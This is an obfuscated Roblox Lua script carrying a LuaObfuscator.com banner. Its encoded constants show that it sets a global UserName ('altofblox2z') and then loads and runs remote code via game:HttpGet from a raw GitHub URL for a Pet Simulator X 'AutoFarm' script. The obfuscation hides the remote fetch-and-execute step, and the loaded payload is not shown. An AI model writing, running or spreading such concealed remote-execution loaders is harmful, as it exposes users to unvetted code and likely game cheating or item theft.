--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=getfenv or function()return _ENV;end;local v9=setmetatable;local v10=pcall;local v11=select;local v12=unpack or table.unpack;local v13=tonumber;local function v14(v15,v16,...)local v17=0;local v18;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;while true do if (1==v17) then v20=nil;v20=function(v30,v31,v32)if v32 then local v65=1797 -(774 + 1023);local v66;while true do if (v65==(219 -(71 + 48 + 100))) then v66=(v30/(2^(v31-(316 -(182 + 133)))))%((2 -0)^(((v32-(1 + 0 + 0)) -(v31-1)) + (4 -3)));return v66-(v66%(1 + (1557 -(47 + 1510))));end end else local v67=(925 -(753 + 170))^(v31-1);return (((v30%(v67 + v67))>=v67) and (3 -2)) or (0 + 0);end end;v21=nil;v17=2;end if (v17==6) then v28=nil;v28=function()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;while true do local v61=238 -(123 + 115);local v62;while true do if (v61~=(951 -(135 + 816))) then else v62=182 -(20 + 162);while true do if (v62==1) then if (v38==3) then local v93=0;while true do if (v93~=(23 -(12 + 11))) then else for v103=977 -(222 + 754),v23() do v40[v103-1]=v28();end for v105=1,v23() do v41[v105]=v23();end v93=3 -2;end if (v93==(1 -0)) then return v42;end end end if ((584 -(378 + 204))==v38) then local v94=0;while true do if (v94==1) then for v107=1,v23() do local v108=0;local v109;local v110;while true do if (0~=v108) then else v109=0 + 0;v110=nil;v108=128 -(88 + 39);end if (v108==1) then while true do if (v109==(0 + 0)) then v110=v21();if (v20(v110,151 -(92 + 58),1)==0) then local v134=0;local v135;local v136;local v137;while true do if (v134==(189 -(123 + 65))) then local v149=0 -0;while true do if (v149~=(4 -3)) then else v134=410 -(402 + 6);break;end if (v149==0) then v137={v22(),v22(),nil,nil};if (v135==0) then local v163=0 -0;local v164;local v165;local v166;while true do if (v163==(1 -0)) then v166=nil;while true do if (v164~=(0 + 0)) then else v165=0 + 0;v166=nil;v164=1;end if (v164~=(1 + 0)) then else while true do if ((0 -0)~=v165) then else v166=0 + 0;while true do if (v166==(709 -(192 + 517))) then v137[3]=v22();v137[4]=v22();break;end end break;end end break;end end break;end if (v163==(0 + 0)) then v164=0;v165=nil;v163=1;end end elseif (v135==1) then v137[1761 -(907 + 851)]=v23();elseif (v135==(2 -0)) then v137[259 -(42 + 214)]=v23() -((1 + 1)^(13 + 3));elseif (v135~=(8 -5)) then else local v183=0;local v184;local v185;while true do if (v183~=1) then else while true do if (v184~=0) then else v185=452 -(386 + 66);while true do if (v185~=(0 + 0)) then else v137[3]=v23() -((217 -(114 + 101))^16);v137[1 + 3]=v22();break;end end break;end end break;end if (0~=v183) then else v184=0;v185=nil;v183=12 -(6 + 5);end end end v149=1;end end end if (v134==0) then local v150=0 -0;while true do if (v150==(1 -0)) then v134=1 + 0;break;end if (v150==(1033 -(880 + 153))) then v135=v20(v110,2,569 -(447 + 119));v136=v20(v110,6 -2,10 -4);v150=1;end end end if (v134~=(1462 -(1348 + 111))) then else if (v20(v136,418 -(234 + 181),3)~=1) then else v137[3 + 1]=v44[v137[9 -5]];end v39[v107]=v137;break;end if (v134==2) then local v152=0;local v153;while true do if (v152==0) then v153=0;while true do if (v153==1) then v134=3 + 0;break;end if (v153~=0) then else if (v20(v136,1,1)==1) then v137[2]=v44[v137[2 + 0]];end if (v20(v136,2,2 -0)==(2 -1)) then v137[19 -(15 + 1)]=v44[v137[6 -3]];end v153=1;end end break;end end end end end break;end end break;end end end v38=2 + 1;break;end if (v94==(0 -0)) then for v111=1,v43 do local v112=0 + 0;local v113;local v114;local v115;while true do if (v112==(1318 -(989 + 329))) then v113=0 -0;v114=nil;v112=1;end if (v112==(1 + 0)) then v115=nil;while true do if (v113~=(734 -(696 + 37))) then else if (v114==(4 -3)) then v115=v21()~=0;elseif (v114==2) then v115=v24();elseif (v114==3) then v115=v25();end v44[v111]=v115;break;end if (v113==0) then local v119=0 + 0;while true do if (v119~=(1 + 0)) then else v113=1;break;end if (v119~=0) then else v114=v21();v115=nil;v119=680 -(311 + 368);end end end end break;end end end v42[3]=v21();v94=1;end end end break;end if (0~=v62) then else local v78=0;while true do if ((0 + 0)==v78) then if (v38~=(0 + 0)) then else local v100=0;while true do if (v100~=(0 -0)) then else v39={};v40={};v100=1;end if (v100~=(1 -0)) then else v41={};v38=1;break;end end end if (v38==1) then local v101=0;local v102;while true do if (v101~=0) then else v102=933 -(79 + 854);while true do if (v102==0) then v42={v39,v40,nil,v41};v43=v23();v102=1;end if (v102~=1) then else v44={};v38=2;break;end end break;end end end v78=1;end if ((1 + 0)==v78) then v62=1 + 0;break;end end end end break;end end end end;v29=nil;v17=7;end if (4==v17) then v24=function()local v45=v23();local v46=v23();return (( -(613 -(55 + 556)) * v20(v46,891 -(452 + 407))) + (1452 -(869 + 582))) * (2^(v20(v46,21,739 -(383 + 325)) -(1661 -(109 + (1084 -(323 + 232)))))) * ((((v20(v46,1 + 0,20) * ((1 + 1)^(7 + 25))) + v45)/((2 -0)^((788 + 752) -(1377 + 111)))) + (1 -(0 + 0)));end;v25=nil;v25=function(v33)local v47;if  not v33 then v33=v23();if (v33==(1921 -(71 + 1850))) then return "";end end v47=v3(v15,v18,(v18 + v33) -(3 -2));v18=v18 + v33;local v48={};for v63=943 -(486 + 456), #v47 do v48[v63]=v2(v1(v3(v47,v63,v63)));end return v6(v48);end;v17=5;end if (v17==7) then v29=function(v34,v35,v36)local v49=0;local v50;local v51;local v52;while true do if (v49==1) then v52=v34[3];return function(...)local v73=1;local v74= -1;local v75={...};local v76=v11("#",...) -1;local function v77()local v79=v50;local v80=v51;local v81=v52;local v82=v27;local v83={};local v84={};local v85={};for v90=787 -(576 + 211),v76 do if (((16 + 64)<((9056 -3951) -((855 -(102 + 91)) + 232))) and (v90>=v81)) then v83[v90-v81]=v75[v90 + ((1159 -(735 + 422)) -1)];else v85[v90]=v75[v90 + 1];end end local v86=(v76-v81) + 1 + 0;local v87;local v88;while true do local v91=0 -0;local v92;while true do if ((v91==(195 -(12 + 183))) or ((5328 -3140)==(1481 -(126 + 25)))) then v92=0;while true do if (((3883 -(1485 + 164))<=(5833 -1745)) and (v92==(892 -(448 + 443)))) then if ((v88<=(4 + 0)) or (4723<1477)) then if ((v88<=(1 + 0)) or (3698>=(4615 -(44 + 132)))) then if (((2572 -(58 + 1176))>=(1566 -(376 + 40 + (546 -422)))) and (v88>0)) then if ((2298<3485) and (v85[v87[5 -3]]==v87[4])) then v73=v73 + ((1 -0) -0);else v73=v87[2 + 1];end else v85[v87[2 + 0]]();end elseif (((929 -(86 + 19))<(5422 -(61 + 1512))) and (v88<=(2 -0))) then do return;end elseif (((2064 + 1944)>=((380 + 4097) -(764 + 930))) and (v88>3)) then v73=v87[(2 -1) + 2];else local v140=(5867 -4294) -(1442 + 131);local v141;local v142;local v143;local v144;while true do if ((v140==(0 -0)) or ((5798 -((2458 -(287 + 900)) + 114))<(430 + 174 + 524))) then v141=0 + 0;v142=nil;v140=1 + (873 -(860 + 13));end if ((v140==(3 -1)) or ((257 + 742)>(4025 -2804))) then while true do if (((2609 -(520 + 1068))<(5681 -(169 + 710))) and (v141==(1 + 0))) then v144=nil;while true do if (((1819 -1177)<=(1340 + 1113)) and (v142==0)) then local v170=0;local v171;while true do if (((2932 + 410)<=(2483 + (2027 -(784 + 153)))) and (v170==(1142 -(750 + 392)))) then v171=834 -(333 + (1502 -1001));while true do if (((1463 -508)==955) and (0==v171)) then v143=v87[2];v144=v85[v87[3 -0]];v171=1 + 0;end if (((864 -616)<(7003 -3865)) and (v171==(1 -0))) then v142=510 -(38 + 16 + 455);break;end end break;end end end if ((v142==(1341 -(241 + 1099))) or (((6672 -(85 + 147)) -3301)==(1211 + 1764))) then v85[v143 + 1]=v144;v85[v143]=v144[v87[10 -6]];break;end end break;end if (((8949 -6907)>(1270 -(566 + 82))) and (v141==0)) then local v162=0 -0;while true do if (((5604 -(1523 + 390))>(52 + 15)) and (v162==(0 -0))) then v142=0 + 0;v143=nil;v162=1 + 0;end if ((v162==(181 -((971 -(673 + 172)) + 54))) or ((213 + 116)>(644 + 1142))) then v141=1 + 0;break;end end end end break;end if ((((3053 + 3244) -3722)<(13705 -(9930 -(161 + 294)))) and ((991 -((569 -(72 + 485)) + 978))==v140)) then v143=nil;v144=nil;v140=2;end end end elseif ((v88<=(4 + 2)) or (((8887 + 2194) -8788)==993)) then if (((5855 -(969 + 537))>=51) and (v88==((32 + 232) -(54 + 205)))) then local v120=1183 -(960 + 223);local v121;local v122;local v123;local v124;local v125;while true do if (((1178 -758)<=3687) and (v120==(4 -3))) then v123=nil;v124=nil;v120=482 -(215 + 265);end if ((v120==(0 + 0)) or (((8077 -4940) -(1217 + 722))==(1305 -802))) then v121=0 + (0 -0);v122=nil;v120=1;end if (((2018 -1255)<=(2344 + 2515)) and (v120==2)) then v125=nil;while true do if (((1764 + 90)<=(3309 -1296)) and (v121==(0 -0))) then local v156=0;local v157;while true do if ((v156==(0 + 0)) or ((714 -(38 + 531))>(3159 -(143 + 1223)))) then v157=0;while true do if (((13785 -10128)>1596) and (v157==1)) then v121=74 -(45 + 28);break;end if ((0==v157) or (4948<(1271 -(25 + (1369 -799))))) then local v179=39 -(10 + (1060 -(412 + 619)));while true do if ((v179==(1264 -(1161 + 102))) or ((3704 -(97 + 228))==(194 + (1923 -(293 + 1299))))) then v157=1 + 0;break;end if ((v179==(1733 -(866 + 867))) or ((828 + 2955)>=3999)) then v122=v87[2 + 0 + 0];v123,v124=v82(v85[v122](v12(v85,v122 + 1 + (0 -0),v87[3])));v179=1 + 0;end end end end break;end end end if ((v121==2) or ((3959 -2422)>=(4519 -1872))) then for v159=v122,v74 do local v160=0;local v161;while true do if (((70 + 1490)<=(16103 -11392)) and ((0 + 0)==v160)) then v161=0 -(0 -0);while true do if (((0 -0)==v161) or (((3136 -(144 + 1493)) -(593 + 675))>((9844 -6057) -(4703 -(883 + 1060))))) then v125=v125 + 1 + 0;v85[v159]=v123[v125];break;end end break;end end end break;end if (((2 -1)==v121) or ((7431 -3427)<=(498 + 1399))) then local v158=0 + 0;while true do if (((3333 -2130)>((7591 -5017) -(397 + 1335))) and (v158==0)) then v74=(v124 + v122) -(1 + 0);v125=0;v158=3 -2;end if (((805 + (2690 -878))>((6220 -(969 + 654)) -2937)) and (v158==1)) then v121=968 -(518 + (1335 -887));break;end end end end break;end end else local v126=0 + 0;local v127;local v128;local v129;while true do if ((1025<(1981 + 394)) and (v126==(1544 -(490 + 1054)))) then v127=0 + 0;v128=nil;v126=1 -0;end if ((v126==(1 + (427 -(321 + 106)))) or ((1161 + 523 + 1325)==(1642 + 92))) then v129=nil;while true do if ((v127==(2 -1)) or ((8065 -4073)==(2662 + 2312))) then while true do if ((v128==(1557 -(360 + 1197))) or ((5914 -2647)==(1785 -(498 + 946)))) then v129=v87[4 -2];v85[v129]=v85[v129](v12(v85,v129 + (57 -(5 + 51)),v74));break;end end break;end if ((v127==(0 -0)) or ((3570 -(305 + 183))<=(1059 + 963))) then v128=0;v129=nil;v127=1 + 0;end end break;end end end elseif (((5231 -(230 + 20))==(12889 -7908)) and (v88<=(1 + 6))) then v85[v87[1 + 1]][v87[3]]=v87[215 -(88 + 123)];elseif ((v88==(971 -(880 + 83))) or ((1939 -1142)>=3999)) then v85[v87[1687 -(820 + (3109 -2244))]]=v36[v87[(1244 + 613) -(1715 + (210 -(6 + 65)))]];else v85[v87[2 -0]]=v87[(1 + 4) -2];end v73=v73 + (2 -1) + 0;break;end if (((1260 -(175 + (4002 -2917)))==v92) or ((2936 -(634 + 345))>=(1529 + 1944))) then local v116=0;while true do if ((v116==(1 + 0)) or ((4643 -(396 + 627))>(4718 -(359 + 203)))) then v92=2 -1;break;end if ((2824==(2679 + 145)) and (v116==(0 -0))) then local v117=0;while true do if ((v117==(1 + 0)) or ((51 + 4653)<=(3579 -2231))) then v116=1;break;end if (((5089 -(532 + 33))<=(14709 -9767)) and ((0 -0)==v117)) then v87=v79[v73];v88=v87[1 + 0];v117=1;end end end end end end break;end end end end A,B=v27(v10(v77));if  not A[1] then local v89=v34[4][v73] or "?";error("Script error at ["   .. v89   .. "]:"   .. A[2]);else return v12(A,2,B);end end;end if (v49==0) then v50=v34[1];v51=v34[2];v49=1;end end end;return v29(v28(),{},v16)(...);end if (v17==2) then v21=function()local v53=v1(v15,v18,v18);v18=v18 + 1;return v53;end;v22=nil;v22=function()local v54,v55=v1(v15,v18,v18 + (3 -1));v18=v18 + 2;return (v55 * (600 -344)) + v54;end;v17=3;end if (v17==5) then v26=v23;v27=nil;v27=function(...)return {...},v11("#",...);end;v17=6;end if (v17==3) then v23=nil;v23=function()local v56=0;local v57;local v58;local v59;local v60;while true do if (v56==(0 -0)) then v57,v58,v59,v60=v1(v15,v18,v18 + (10 -7));v18=v18 + (12 -8);v56=3 -(2 -0);end if (v56==1) then return (v60 * (5569434 + 11207782)) + (v59 * (90951 -25415)) + (v58 * (254 + 2)) + v57;end end end;v24=nil;v17=4;end if (v17==0) then v18=1;v19=nil;v15=v4(v3(v15,5),"..",function(v37)if (v1(v37,2)==79) then v19=v0(v3(v37,1,1));return "";else local v68=v2(v0(v37,16));if v19 then local v72=v5(v68,v19);v19=nil;return v72;else return v68;end end end);v17=1;end end end v14("LOL!083O00028O0003023O005F4703083O00557365724E616D65030B3O00616C746F66626C6F78327A030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F7258536372697074732F6D61696E2F4175746F4661726D2E6C7561000F3O0012093O00013O0026013O000100010001002O043O00010001001208000100023O003007000100030004001208000100053O001208000200063O002003000200020007001209000400084O0005000200044O000600013O00024O000100010001002O043O000E0001002O043O000100012O00023O00017O000F3O00023O00043O00043O00053O00053O00063O00063O00063O00063O00063O00063O00063O00073O00083O000A3O00",v8(),...);end
